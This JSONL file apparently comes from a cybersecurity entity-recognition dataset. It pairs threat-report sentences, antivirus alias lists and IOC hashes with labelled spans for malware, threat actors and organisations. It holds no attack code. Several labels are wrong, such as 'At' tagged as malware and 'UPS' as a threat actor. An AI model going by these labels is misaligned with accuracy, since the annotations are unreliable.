{"text": "The gopuram backdoor might be the main implant and the final payload in the attack chain.", "spans": {"MALWARE: The gopuram": [[0, 11]], "MALWARE: backdoor": [[12, 20]], "MALWARE: implant": [[39, 46]], "MALWARE: final payload": [[55, 68]]}, "info": {"id": "cyner2_train_007234", "source": "cyner2_train"}}
{"text": "We also observed that the threat actors were actively changing their tools, tactics, and procedures TTPs to bypass security solutions.", "spans": {"THREAT_ACTOR: the threat actors": [[22, 39]], "MALWARE: tools,": [[69, 75]], "VULNERABILITY: bypass security solutions.": [[108, 134]]}, "info": {"id": "cyner2_train_007235", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Java.Exploit.CVE-2012-0507.K Exp.JAVA.CVE-2012-0507 Trojan.Inject.GE Exploit.CVE.JS.1533 Exploit.Java.Cve!c Java.Exploit.CVE-2012-0507.K Trojan.Maljava Java/Exploit.CVE-2012-0507.AJ JAVA_EXPLOIT.KRZ Exploit.Java.CVE-2012-0507.gd Exploit.Java.CVE20120507.cqxpdq Java.S.CVE-2012-0507.141383[h] Java.Exploit.CVE-2012-0507.K Java.Exploit.CVE-2012-0507.K Exploit.CVE2012-0507.13 JAVA_EXPLOIT.KRZ BehavesLike.Downloader.cz Exploit.CVE-2012-0507.d JAVA/Adwind.sagg.26 Java.Exploit.CVE-2012-0507.K Exploit.Java.CVE-2012-0507.eg Java.Exploit.Cve-2012-0507.Akpd Exploit.Java.CVE-2012-0507 Java.Exploit.CVE-2012-0507.K Java/Exploit.AZT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007237", "source": "cyner2_train"}}
{"text": "The final stage is an ARMEB version from the LuaBot Malware.", "spans": {"MALWARE: ARMEB version": [[22, 35]], "MALWARE: LuaBot Malware.": [[45, 60]]}, "info": {"id": "cyner2_train_007238", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.5441 Win32.Trojan.WisdomEyes.16070401.9500.9941 TROJ_INJECT.AUSPTO Trojan.Win32.Phpw.gez Trojan.Win32.Phpw.expttn TROJ_INJECT.AUSPTO BehavesLike.Win32.Trojan.cc Trojan.Win32.Themida W32/Trojan.JODZ-3607 Trojan.Win32.Phpw.gez Backdoor:MSIL/Zqorat.A Trojan/Win32.Phpw.C2403487 TScope.Malware-Cryptor.SB Trj/CI.A Win32.Trojan.Phpw.Ahym", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007239", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VBS.Downloader.ADR JS.Ransom.R VBS/Downldr.HM VBS.Downloader.B Vbs.Downloader.Locky-6348805-0 Trojan.VBS.Downloader.ADR Trojan.VBS.Downloader.ADR Trojan.Script.Vbs-heuristic.druvzi VBS.Downloader.11760 Troj.Downloader.Script!c Trojan.VBS.Downloader.ADR Trojan.VBS.Downloader.ADR VBS.DownLoader.957 VBS/Downloader.ea VBS/Downldr.HM Trojan.VBS.Downloader.ADR VBS/Obfus.S4 VBS/Downloader.ea Js.Trojan.Raas.Auto Trojan-Downloader.JS.Nemucod", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007243", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware14 Trojan/W32.Nymaim.478544 Trojan.Win32.Shiz.3!O Trojan.Kryptik.Win32.905858 Trojan.Inject2.25223 Trojan:Win32/Pennelas.A!gfc Trojan/Win32.Silcon.R186780 Trojan.Nymaim!w9Ehxpvgr9U Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007244", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Htool.WIP Trojan.Mauvaise.SL1 HackTool.BruteForce Trojan/Hacktool.BruteForce.ze Application.Htool.WIP Win32.Trojan.WisdomEyes.16070401.9500.9930 Win32/Tnega.dRWGBOC HV_BRUTEFORCE_CG153BD9.RDXN Win.Trojan.Bruteforce-13 Application.Htool.WIP Application.Htool.WIP Trojan.Win32.BruteForce.srzyv Application.Htool.WIP Tool.Bruteforce.185 Tool.BruteForce.Win32.254 HackTool.Win32.BruteForce HTool.BruteForce.f SPR/DUBrute.owoan HackTool/Win32.BruteForce HackTool:Win32/DUBrute.A HackTool.BruteForce Trojan/Win32.Bruteforce.R23399 HackTool.BruteForce!jw9TQR6yLS4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007246", "source": "cyner2_train"}}
{"text": "This is worm-like ransomware based on Petya.", "spans": {"MALWARE: worm-like ransomware": [[8, 28]], "MALWARE: Petya.": [[38, 44]]}, "info": {"id": "cyner2_train_007247", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE W32.Francette.M W32.Francette.Worm Heur.Corrupt.PE Backdoor.Win32.RedSpy Worm:Win32/Francette.M.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007248", "source": "cyner2_train"}}
{"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda 1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2 ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ .", "spans": {}, "info": {"id": "cyner2_train_007249", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Emudbot.S15201 Worm.AutoRun.Win32.57341 W32/AutoRun.diqe Win32.Trojan.WisdomEyes.16070401.9500.9953 Win.Worm.Autorun-9966 Worm.AutoRun Trojan.Win32.Emud.reytg Win32.HLLW.EmudBot.12 BehavesLike.Win32.BadFile.kh Worm/AutoRun.agrm W32.Worm.Autorun Worm.Autorun.kcloud Worm:Win32/Emudbot.A Trojan.Graftor.Elzob.D3011 Worm/Win32.AutoRun.C69047 Win32/AutoRun.Delf.MI Worm.AutoRun!NSqws7tLdQs Worm.Win32.Emudbot W32/Autorun.BGT!tr Win32/Trojan.Dropper.65e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007250", "source": "cyner2_train"}}
{"text": "We Kaspersky have already seen some cryptor attacks where malicious programs with different functions have been used in combination.", "spans": {"ORGANIZATION: Kaspersky": [[3, 12]], "MALWARE: malicious programs": [[58, 76]]}, "info": {"id": "cyner2_train_007252", "source": "cyner2_train"}}
{"text": "iSIGHT Partners has dubbed the intrusion operators who leverage the CVE-2014-4114 zero-day Sandworm Team. The name was chosen due to unique references to the classic science fiction series Dune, which are characterized by the use of multiple BlackEnergy malware variants.", "spans": {"ORGANIZATION: iSIGHT Partners": [[0, 15]], "THREAT_ACTOR: intrusion operators": [[31, 50]], "VULNERABILITY: CVE-2014-4114 zero-day": [[68, 90]], "THREAT_ACTOR: Sandworm Team.": [[91, 105]], "MALWARE: BlackEnergy malware variants.": [[242, 271]]}, "info": {"id": "cyner2_train_007254", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Teper Trojan/AutoRun.Delf.lv Trojan.MSIL.Krypt.11 Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_INJECTOR_FA250012.UVPM Trojan.Win32.DarkKomet.dkhkpy TrojWare.MSIL.Teper.A Trojan.PWS.Stealer.13025 TROJ_INJECTOR_FA250012.UVPM BehavesLike.Win32.Trojan.dc Backdoor/Androm.dvy TR/Inject.xbbeiet W32/Vobfus.GEP.worm Win32/AutoRun.Delf.LV Win32.Worm.Autorun.Suxp Win32/Trojan.d74", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007255", "source": "cyner2_train"}}
{"text": "They are using the RockLoader malware to download Bart over HTTPS.", "spans": {"MALWARE: RockLoader malware": [[19, 37]], "MALWARE: Bart": [[50, 54]]}, "info": {"id": "cyner2_train_007258", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Trojan.WisdomEyes.16070401.9500.9996 W32.SillyFDC Win32/Auraax.W Win.Trojan.Zbot-1219 Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Win32.Worm.Autorun.MK Trojan.DownLoad.5092 Worm.AutoRun.Win32.24333 Backdoor.W32.Bifrose.kZn8 Win32/AutoRun.YM Trojan-Spy.Win32.Zbot W32/Autorun.MFA!worm Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007259", "source": "cyner2_train"}}
{"text": "The threat posed by custom malware such as Dripion illustrates the value of multilayered security.", "spans": {"MALWARE: threat": [[4, 10]], "MALWARE: custom malware": [[20, 34]], "MALWARE: Dripion": [[43, 50]]}, "info": {"id": "cyner2_train_007260", "source": "cyner2_train"}}
{"text": "However, it doesn't stop there: some versions of RAA also include a Pony Trojan file, which steals confidential information from the infected computer.", "spans": {"MALWARE: RAA": [[49, 52]], "MALWARE: Pony Trojan file,": [[68, 85]], "SYSTEM: the infected computer.": [[129, 151]]}, "info": {"id": "cyner2_train_007261", "source": "cyner2_train"}}
{"text": "The attack was initially thought to be attributed to North Korea, by way of a Chinese IP found during the attack, but no other strong evidence of North Korea's involvement has been produced since then.", "spans": {}, "info": {"id": "cyner2_train_007263", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PPDropper.F PPT97/PPDropper.C TROJ_PPDROPPER.L TROJ_PPDROPPER.L Exploit-PPT.d Exploit:Win32/Nappto.A Exploit-PPT.d PP97M/TrojanDropper.PPDrop.F Trojan-Dropper.PP97M.Ppdrop Exploit/PPT.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007265", "source": "cyner2_train"}}
{"text": "This is the same behaviour we have been seeing with the recent UPS failed to deliver nemucod ransomware versions", "spans": {"THREAT_ACTOR: UPS": [[63, 66]], "MALWARE: nemucod ransomware versions": [[85, 112]]}, "info": {"id": "cyner2_train_007267", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Ryzerlo.S4 Trojan.Ransom.HiddenTear Trojan.Ransom.HiddenTears.1 Win32.Trojan.WisdomEyes.16070401.9500.9717 Ransom.HiddenTear!g1 Ransom_CRYPTEAR.SMI1 Trojan.Win32.Encoder.ewzwkj Trojan.Win32.Z.Ransom.174592.P Trojan.Encoder.10598 Ransom_CRYPTEAR.SMI1 Trojan-Ransom.HiddenTear W32/Ransom.EJHW-4383 TR/Downloader.fuswg Ransom:MSIL/Flyterper.A Trj/GdSda.A Win32/Trojan.Ransom.786", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007268", "source": "cyner2_train"}}
{"text": "Several indicators inside the samples we have analysed point to a new major version of the malware.", "spans": {"MALWARE: samples": [[30, 37]], "MALWARE: malware.": [[91, 99]]}, "info": {"id": "cyner2_train_007271", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DroppenAS.Trojan Worm.Nohad.A9 Trojan/AutoRun.Delf.qi Win32.Worm.Delf.bw W32/Trojan.KDXB-0268 Win32/Tnega.AUMK WORM_SOHANAD.SM0 Win32.Worm.Autorun.T Trojan.Win32.Special.dtabba Trojan.Fakealert.51818 WORM_SOHANAD.SM0 W32/Trojan2.OEMC TR/Dropper.pjrqu Trojan.Zusy.D18D1A HEUR/Fakon.mwf Win32/AutoRun.Delf.QI W32/AutoRun.QIAU!tr VBS/Jenxcus.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007272", "source": "cyner2_train"}}
{"text": "We identified over two hundred samples of malware generated by the group over the last two years.", "spans": {"MALWARE: malware": [[42, 49]], "THREAT_ACTOR: the group": [[63, 72]]}, "info": {"id": "cyner2_train_007273", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/AutoRun.bhyp Trojan.Heur.E5CD44 Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/MalwareF.IWEH Win.Spyware.76175-2 Trojan.Win32.FrusEfas.iumlo Worm.Win32.Autorun.2101887 Trojan.MulDrop1.52015 BehavesLike.Win32.BadFile.vc W32/Risk.GYGM-4699 TrojanClicker.FrusEfas.a Trojan:Win32/Tofe.A Worm.AutoRun Trojan-GameThief.Win32.Magania", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007274", "source": "cyner2_train"}}
{"text": "To that end, I have been working on automating ways to help ASERT better understand the context around samples so we can answer question about what may have been targeted, why it was targeted and when it was targeted.", "spans": {}, "info": {"id": "cyner2_train_007276", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Simda.A Trojan.Beaugrit.S714409 Backdoor.Simda.A Trojan.Shiz.Win32.341 Trojan/Spy.Shiz.ncd Win32.Trojan-Spy.Shiz.b Backdoor.Trojan TROJ_BEAUGRIT_GC3101D5.UVPM Backdoor.Simda.A Backdoor.Simda.A TrojWare.Win32.Spy.Shiz.AB Backdoor.Simda.A Trojan.PWS.Ibank.300 TROJ_BEAUGRIT_GC3101D5.UVPM BehavesLike.Win32.Backdoor.jh Backdoor.Win32.Simda Backdoor.Simda.A Backdoor.Simda.A Backdoor.Simda TrojanSpy.Shiz!u9u05UapnAM W32/Shiz.NBX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007277", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutorunSevLnr.Worm Worm.AutoRun.Win32.27239 WORM_VERST.SM Win32.Worm.AutoRun.fp W32/Trojan2.OAQT WORM_VERST.SM Trojan.Win32.AutoRun.bxdzl W32.Virut.mDxm BackDoor.Pushnik.16 BehavesLike.Win32.Autorun.jc W32/Trojan.ORVC-8944 Worm/AutoRun.zqc W32.Worm.Lj Worm:Win32/Verst.A Trojan.Rimecud.2 Worm.Win32.A.P2P-Palevo.649216 HEUR/Fakon.mwf W32/Autorun.worm.bcf Worm.AutoRun Trojan.Dropper Win32/AutoRun.Delf.DK Trojan.Kryptik!Od8vCev28v4 Trojan.Win32.DNSChanger Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007278", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.FakeTool.eqvbgr Trojan.Strictor.D13D9C Riskware.HackTool!mJNDS6pSVDk HackTool.Win32.FakeHack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007279", "source": "cyner2_train"}}
{"text": "In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active.", "spans": {"ORGANIZATION: Trend Micro": [[16, 27]], "ORGANIZATION: ClearSky": [[32, 40]], "THREAT_ACTOR: espionage apparatus": [[55, 74]], "THREAT_ACTOR: the group": [[100, 109]]}, "info": {"id": "cyner2_train_007281", "source": "cyner2_train"}}
{"text": "the first of a new wave of malspam.", "spans": {}, "info": {"id": "cyner2_train_007282", "source": "cyner2_train"}}
{"text": "MacSpy is advertised as the most sophisticated Mac spyware ever with the low starting price of free.", "spans": {"MALWARE: MacSpy": [[0, 6]], "MALWARE: Mac spyware": [[47, 58]]}, "info": {"id": "cyner2_train_007284", "source": "cyner2_train"}}
{"text": "However, they do deploy some novel tactics, detailed below, and the implications of these attacks could be significant.", "spans": {}, "info": {"id": "cyner2_train_007285", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RsRabND.Worm Trojan.Ransom.BUY Trojan.Ransom.BUY Ransom.BadRabbit Win32.Trojan.Ransom.b Ransom_BADRABBIT.SM Win.Ransomware.BadRabbit-6355462-2 Trojan.Ransom.BUY Trojan-Ransom.Win32.BadRabbit.e Trojan.Ransom.BUY Trojan.Win32.BadRabbit.euhxbd Trojan.Win32.Ransom.441899 Trojan.Ransom.BUY Trojan.BadRabbit.2 Ransom_BADRABBIT.SM BehavesLike.Win32.Malware.gc Trojan.Win32.Diskcoder Trojan.BadRabbit.d TR/Dropper.uobxc Trojan.Ransom.BUY Trojan-Ransom.Win32.BadRabbit.e Trojan/Win32.Diskcoder.R211512 Trojan-Ransom.BadRabbit Trj/CI.A Trojan.Badrabbit Win32/Diskcoder.D Trojan.Diskcoder! ransom.BadRabbit Win32/Trojan.RansomBadRabbit.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007286", "source": "cyner2_train"}}
{"text": "We actually track samples of Winnti malware all the time, but so far we haven't been able to catch one with solid clues indicating other targeted industries.", "spans": {"MALWARE: Winnti malware": [[29, 43]]}, "info": {"id": "cyner2_train_007287", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TR/Drop.Hirin.B PWS:MSIL/Parple.B PWS.MSIL Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007288", "source": "cyner2_train"}}
{"text": "Google's Threat Analysis Group TAG recently discovered usage of an unpatched security bypass in Microsoft's SmartScreen security feature, which financially motivated actors are using to deliver the Magniber ransomware without any security warnings.", "spans": {"ORGANIZATION: Google's Threat Analysis Group TAG": [[0, 34]], "VULNERABILITY: unpatched security bypass": [[67, 92]], "SYSTEM: Microsoft's SmartScreen security feature,": [[96, 137]], "THREAT_ACTOR: financially motivated actors": [[144, 172]], "MALWARE: the Magniber ransomware": [[194, 217]]}, "info": {"id": "cyner2_train_007289", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Gamehack Trojan.Packed.Win32.57174 Win32.Packed.VMProtect.a HT_GAMEHACK_GH01014A.UVPM HT_GAMEHACK_GH01014A.UVPM Trojan.VMProtect!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007290", "source": "cyner2_train"}}
{"text": "Few details were given and no hashes were available, which made it interesting to find samples and conduct an initial analysis.", "spans": {}, "info": {"id": "cyner2_train_007291", "source": "cyner2_train"}}
{"text": "Given its age, it might seem logical that security controls would have this threat on lockdown.", "spans": {}, "info": {"id": "cyner2_train_007293", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Clicker!BT Win32.Trojan.Wowlik.a W32/Trojan.AKEF-2737 Trojan.Win32.Graftor.espyif Win32.Trojan.Graftor.Llrb TrojWare.Win32.Wowlik.BE Trojan.DownLoader11.55853 Trojan.Graftor.D26FB7 TrojanClicker:Win32/Spackit.A Trojan.Win32.Clicker!BT Trj/CI.A Win32/Trojan.55a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007294", "source": "cyner2_train"}}
{"text": "What's particularly interesting is that the malware that was used this time is not BlackEnergy, which poses further questions about the perpetrators behind the ongoing operation.", "spans": {"MALWARE: malware": [[44, 51]], "THREAT_ACTOR: BlackEnergy,": [[83, 95]], "THREAT_ACTOR: operation.": [[168, 178]]}, "info": {"id": "cyner2_train_007296", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97m.Downloader.EMU W97M.Downloader.MF W97M/Dropper.cp Troj.Dropper.Msword!c Trojan.Mdropper W2KM_DROPPR.CSYH W97m.Downloader.EMU W97m.Downloader.EMU W97m.Downloader.EMU Trojan:W97M/Nastjencro.A W97M.MulDrop.142 W2KM_DROPPR.CSYH W97M/Dropper.cp W97m.Downloader.EMU W97m.Downloader.EMU OLE.Win32.Macro.700400 virus.office.obfuscated.5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007297", "source": "cyner2_train"}}
{"text": "The version number was bumped to 1.6.2a.", "spans": {}, "info": {"id": "cyner2_train_007299", "source": "cyner2_train"}}
{"text": "Our research points to centralized planning and development by one or more advanced persistent threat APT actors.", "spans": {"THREAT_ACTOR: advanced persistent threat APT actors.": [[75, 113]]}, "info": {"id": "cyner2_train_007302", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G W32/Virut.AM Win32/Virut.17408 PE_VIRUX.R Win32.Virus.Virut.U Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.lqR9 Win32.Virut.56 Virus.Virut.Win32.1938 PE_VIRUX.R BehavesLike.Win32.VBObfus.dc W32/Virut.AM Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.dd.368640 Virus.Win32.Virut.ce Win32/Virut.F Win32/Virut.NBP W32/Virut.CE Virus.Virut.14 W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007304", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.LionumD.Trojan Trojan.Injector.AF Trojan-Spy.Win32.Zbot!O Trojan.CoinMiner.Win32.82 Trojan.Injector.AF Trojan.Win32.Delf.bkqgta Trojan.Injector.AF Trojan.DownLoader7.62911 Trojan/Win32.Miner TrojanDownloader:Win32/Hoptto.B Trojan.Injector.AF Trojan.Injector.AF Trojan.Injector.AF Virus.Win32.DelfInject", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007305", "source": "cyner2_train"}}
{"text": "Research reports on the adversary are published from LAC SecureWorks and Palo Alto Networks", "spans": {"ORGANIZATION: Research": [[0, 8]], "THREAT_ACTOR: the adversary": [[20, 33]], "ORGANIZATION: LAC": [[53, 56]], "ORGANIZATION: SecureWorks": [[57, 68]], "ORGANIZATION: Palo Alto Networks": [[73, 91]]}, "info": {"id": "cyner2_train_007306", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.50FA Trojan.Win32.Pakes.miu Trojan.Symmi.D62C5 Trojan.Win32.Bepiv TR/Drop.RKit.CM Backdoor:WinNT/Tofsee.A.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007308", "source": "cyner2_train"}}
{"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ? It abuses accessibility services .", "spans": {"SYSTEM: Android": [[18, 25]], "MALWARE: TrickMo": [[45, 52]]}, "info": {"id": "cyner2_train_007309", "source": "cyner2_train"}}
{"text": "A recent research by Check Point Research shows how voice phishing can be used to infiltrate the South Korean banking sector and extract private data from the victim's mobile device, and how to prevent it.", "spans": {"ORGANIZATION: Check Point Research": [[21, 41]], "ORGANIZATION: the South Korean banking sector": [[93, 124]], "SYSTEM: the victim's mobile device,": [[155, 182]]}, "info": {"id": "cyner2_train_007311", "source": "cyner2_train"}}
{"text": "The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed.", "spans": {"MALWARE: malware": [[4, 11]], "VULNERABILITY: 24 potential security products that": [[57, 92]], "SYSTEM: system": [[113, 119]]}, "info": {"id": "cyner2_train_007314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.ZIY Trojan-PSW.Win32.Tepfer!O Trojan.Fareit.S467850 Trojan.Tepfer.Win32.85789 Trojan/Fareit.a Trojan.PWS.ZIY Win32.Trojan-PSW.Fareit.a Win32/PSW.Fareit.A BKDR_PONY.SM Win.Trojan.Fareit-403 Trojan.PWS.ZIY Trojan.Win32.Tepfer.dnnwuu Trojan.PWS.ZIY TrojWare.Win32.PWS.Fareit.GS Trojan.PWS.ZIY Trojan.PWS.Stealer.1932 BKDR_PONY.SM BehavesLike.Win32.ZBot.nh W32.Tepfer TR/PSW.Fareit.iloen Trojan[PSW]/Win32.Tepfer Trojan.Win32.PSW-Tepfer.92672 Trojan/Win32.Tepfer.R50650 Trojan.PWS.ZIY BScope.Malware-Cryptor.Ponik Spyware.Pony Trj/Tepfer.D Trojan.Fareit Win32.Outbreak Win32.Trojan-Stealer.Zbot.AB Win32/Trojan.PSW.5cd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007315", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TSPY_DOWNLOADER_DD300501.UVPA Win32.Trojan.WisdomEyes.16070401.9500.9967 Infostealer.Donx TSPY_DOWNLOADER_DD300501.UVPA Trojan.Win32.VB.ckqm Trojan.VB.Win32.119679 BehavesLike.Win32.Sality.dm Worm.Win32.VB Trojan/VB.cvqf Trojan/Win32.VB Worm:Win32/Vberaspul.A Trojan.Heur.RX.E04E5F Trojan.Win32.VB.ckqm Trojan/Win32.VB.R85915 Trojan.VB Win32/AutoRun.VB.BDA Trojan.VB!nw7hcYRbBc8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007319", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_CLICKER.API W32/Trojan.HUCV-9091 TROJ_CLICKER.API Win.Trojan.Clicker-2623 Trojan.Win32.Click.ddmsji W32/Trojan2.GMLR Adware/Clicker.hjb TrojanDownloader:Win32/Valfroc.A Win32.Trojan.Clicker.Tbip W32/CLICKER.API!tr Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007321", "source": "cyner2_train"}}
{"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml these lines instead : Data Collection and Exfiltration As mentioned , mike.jar equips the spyware with extensive collection capabilities , including : Retrieve a list of installed applications .", "spans": {"ORGANIZATION: Huawei": [[81, 87]], "ORGANIZATION: Samsung": [[191, 198]]}, "info": {"id": "cyner2_train_007322", "source": "cyner2_train"}}
{"text": "Seeing this type of activity typically indicates that a particular ransomware will see much wider distribution and thus a larger amount of victims.", "spans": {"MALWARE: ransomware": [[67, 77]], "ORGANIZATION: a larger amount of victims.": [[120, 147]]}, "info": {"id": "cyner2_train_007324", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.LibPatcher!O W32/Trojan.KFBA-3961 Trojan.KillAV Win32/KillAV.EA RTKT_BUREY.C TrojWare.Win32.AntiAV.~B Trojan.MulDrop.30985 Downloader.LibPatcher.Win32.272 RTKT_BUREY.C BehavesLike.Win32.Backdoor.mc W32/Dldr.Age.41984.C Trojan[Downloader]/Win32.LibPatcher Trojan:Win32/Perkesh.A Trojan/Win32.KillAV.R5311 Win32.Trojan-downloader.Libpatcher.Dumk Trojan-Downloader.Win32.Perkesh W32/Perkesh.A!tr Win32/Virus.81b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007325", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.CKTNum.Trojan Virus.Win32.VB!O Virus.VB.Win32.90 W32.W.Mabezat.kZb9 Trojan.Heur.E2A0A7 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Worm.EJIG-5497 Trojan.Killfiles Win32/Disackt.B TROJ_VB.BHC Trojan.Win32.VB.mrc Virus.Win32.VB.bcfhqp Win32.Trojan.Vb.Eddp TrojWare.Win32.VB.AMN TROJ_VB.BHC BehavesLike.Win32.Downloader.mz W32/Worm.AWSI Virus.VB.bc W32/Overwriter.A Worm:Win32/Disackt.A Trojan.Win32.VB.mrc TScope.Trojan.VB Win32/VB.AMN Trojan.VB!eJU5EBjve4c Virus.Win32.VB W32/VB.AMN!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007326", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.49152.AYF Trojan.Dofoil.A Trojan/Kryptik.vgb Win32.Trojan.WisdomEyes.16070401.9500.9963 W32/Trojan.QQGJ-6488 Trojan.Win32.ULPM.eszgb Trojan.Yakes.Win32.1447 BehavesLike.Win32.Conficker.pc Trojan-Dropper.Win32.Injector W32/Kryptik.VIA!tr Trojan.Kazy.DABAF TrojanDropper:Win32/Finkmilt.C Trojan/Win32.Yakes.C144665 BScope.Trojan.Jorik.1421 Trojan.Kryptik!Y5cjjPIzRWk Bck/Qbot.AO Win32/Trojan.aeb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007327", "source": "cyner2_train"}}
{"text": "At the end of December 2015, the network system of Ukrainian power companies was attacked by", "spans": {"MALWARE: At": [[0, 2]], "ORGANIZATION: network system of Ukrainian power companies": [[33, 76]]}, "info": {"id": "cyner2_train_007328", "source": "cyner2_train"}}
